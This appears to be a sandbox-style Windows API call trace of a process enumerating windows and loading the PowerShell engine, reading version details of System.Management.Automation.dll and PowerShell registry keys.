	[0249.092] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.093] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.093] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x818
	[0249.093] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x5b8
	[0249.093] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x494
	[0249.093] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x1ec
	[0249.093] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x440
	[0249.093] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x7e8
	[0249.093] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x730
	[0249.093] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x2c8
	[0249.093] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x31c
	[0249.093] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x330
	[0249.094] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x128
	[0249.094] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x5c8
	[0249.094] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x6f8
	[0249.094] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x358
	[0249.094] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x73c
	[0249.094] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0xb0
	[0249.094] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x250
	[0249.094] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x240
	[0249.094] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x790
	[0249.094] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x61c
	[0249.094] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x540
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x538
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x568
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x538
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x568
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x538
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x540
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x540
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x510
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x57c
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x460
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x554
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.095] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x528
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x79c
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4e0
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x460
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x460
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x44c
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x778
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x460
	[0249.096] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x558
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0xa28
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x9b0
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x8d8
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x940
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x93c
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4ec
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x150
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x720
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x3c4
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x7d4
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x6c8
	[0249.097] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0xb54
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0xb54
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0xb5c
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x838
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x818
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x5b8
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x494
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x1ec
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x440
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x7e8
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x730
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x2c8
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x31c
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x330
	[0249.098] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x128
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x5c8
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x6f8
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x358
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x73c
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0xb0
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x250
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x240
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x790
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x61c
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x568
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x538
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x540
	[0249.099] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x510
	[0249.100] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x460
	[0249.100] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x79c
	[0249.100] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4e0
	[0249.100] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x460
	[0249.100] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x778
	[0249.103] WerSetFlags () returned 0x0
	[0249.110] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0249.110] CoTaskMemFree (pv=0x0) 
	[0249.111] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dd68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dd60 | out: pulNumLanguages=0x26dd68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dd60) returned 1
	[0249.111] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dd68, pwszLanguagesBuffer=0x2d1dd30, pcchLanguagesBuffer=0x26dd60 | out: pulNumLanguages=0x26dd68, pwszLanguagesBuffer=0x2d1dd30, pcchLanguagesBuffer=0x26dd60) returned 1
	[0249.115] CoTaskMemAlloc (cb=0x24) returned 0x514ff0
	[0249.115] GetUserDefaultLocaleName (in: lpLocaleName=0x514ff0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0249.115] CoTaskMemFree (pv=0x514ff0) 
	[0249.599] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0249.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.599] CoTaskMemFree (pv=0x517f40) 
	[0249.600] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0249.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.600] CoTaskMemFree (pv=0x517f40) 
	[0249.602] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0249.602] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.602] CoTaskMemFree (pv=0x517f40) 
	[0249.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.611] SetErrorMode (uMode=0x1) returned 0x1
	[0249.611] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26d9e0 | out: lpFileInformation=0x26d9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0249.611] SetErrorMode (uMode=0x1) returned 0x1
	[0249.611] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dc50 | out: lpdwHandle=0x26dc50) returned 0x94c
	[0249.618] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d215c0 | out: lpData=0x2d215c0) returned 1
	[0250.095] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dbc8, puLen=0x26dbc0 | out: lplpBuffer=0x26dbc8*=0x2d2165c, puLen=0x26dbc0) returned 1
	[0250.095] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x2d21738, puLen=0x26db30) returned 1
	[0250.095] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0250.095] CoTaskMemAlloc (cb=0x2e) returned 0x51c6e0
	[0250.095] lstrcpyW (in: lpString1=0x51c6e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0250.095] CoTaskMemFree (pv=0x51c6e0) 
	[0250.095] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x2d2178c, puLen=0x26db30) returned 1
	[0250.095] lstrlenW (lpString="System.Management.Automation") returned 28
	[0250.095] CoTaskMemAlloc (cb=0x3c) returned 0x5251d0
	[0250.095] lstrcpyW (in: lpString1=0x5251d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0250.095] CoTaskMemFree (pv=0x5251d0) 
	[0250.095] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x2d217e8, puLen=0x26db30) returned 1
	[0250.095] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0250.095] CoTaskMemAlloc (cb=0x20) returned 0x5226d0
	[0250.096] lstrcpyW (in: lpString1=0x5226d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0250.096] CoTaskMemFree (pv=0x5226d0) 
	[0250.096] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x2d21828, puLen=0x26db30) returned 1
	[0250.096] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0250.096] CoTaskMemAlloc (cb=0x44) returned 0x5251d0
	[0250.096] lstrcpyW (in: lpString1=0x5251d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0250.096] CoTaskMemFree (pv=0x5251d0) 
	[0250.096] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x2d21890, puLen=0x26db30) returned 1
	[0250.096] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0250.096] CoTaskMemAlloc (cb=0x76) returned 0x4c1350
	[0250.096] lstrcpyW (in: lpString1=0x4c1350, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0250.096] CoTaskMemFree (pv=0x4c1350) 
	[0250.096] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x2d2192c, puLen=0x26db30) returned 1
	[0250.096] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0250.096] CoTaskMemAlloc (cb=0x44) returned 0x5251d0
	[0250.096] lstrcpyW (in: lpString1=0x5251d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0250.096] CoTaskMemFree (pv=0x5251d0) 
	[0250.096] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x2d21990, puLen=0x26db30) returned 1
	[0250.096] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0250.096] CoTaskMemAlloc (cb=0x58) returned 0x4e7970
	[0250.096] lstrcpyW (in: lpString1=0x4e7970, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0250.096] CoTaskMemFree (pv=0x4e7970) 
	[0250.096] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x2d21a0c, puLen=0x26db30) returned 1
	[0250.096] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0250.096] CoTaskMemAlloc (cb=0x20) returned 0x5226d0
	[0250.096] lstrcpyW (in: lpString1=0x5226d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0250.096] CoTaskMemFree (pv=0x5226d0) 
	[0250.096] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x2d216b4, puLen=0x26db30) returned 1
	[0250.096] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0250.096] CoTaskMemAlloc (cb=0x66) returned 0x520aa0
	[0250.096] lstrcpyW (in: lpString1=0x520aa0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0250.096] CoTaskMemFree (pv=0x520aa0) 
	[0250.096] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x0, puLen=0x26db30) returned 0
	[0250.096] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x0, puLen=0x26db30) returned 0
	[0250.096] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x0, puLen=0x26db30) returned 0
	[0250.096] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26db08, puLen=0x26db00 | out: lplpBuffer=0x26db08*=0x2d2165c, puLen=0x26db00) returned 1
	[0250.097] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0250.097] VerLanguageNameW (in: wLang=0x0, szLang=0x4c3ad0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0250.097] CoTaskMemFree (pv=0x4c3ad0) 
	[0250.097] VerQueryValueW (in: pBlock=0x2d215c0, lpSubBlock="\\", lplpBuffer=0x26db58, puLen=0x26db50 | out: lplpBuffer=0x26db58*=0x2d215e8, puLen=0x26db50) returned 1
	[0250.104] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0250.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.104] CoTaskMemFree (pv=0x517f40) 
	[0250.105] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0250.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.105] CoTaskMemFree (pv=0x517f40) 
	[0250.105] lstrlenW (lpString="䅁") returned 1
	[0250.109] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26da28 | out: phkResult=0x26da28*=0x300) returned 0x0
	[0250.110] RegOpenKeyExW (in: hKey=0x300, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x26da18 | out: phkResult=0x26da18*=0x304) returned 0x0
	[0250.110] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26daa8 | out: phkResult=0x26daa8*=0x308) returned 0x0
	[0250.114] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d9ec, lpData=0x0, lpcbData=0x26d9e8*=0x0 | out: lpType=0x26d9ec*=0x1, lpData=0x0, lpcbData=0x26d9e8*=0x56) returned 0x0
	[0250.115] CoTaskMemAlloc (cb=0x5a) returned 0x520a30
	[0250.115] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d9bc, lpData=0x520a30, lpcbData=0x26d9b8*=0x56 | out: lpType=0x26d9bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d9b8*=0x56) returned 0x0
	[0250.115] CoTaskMemFree (pv=0x520a30) 
	[0250.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0250.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0250.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
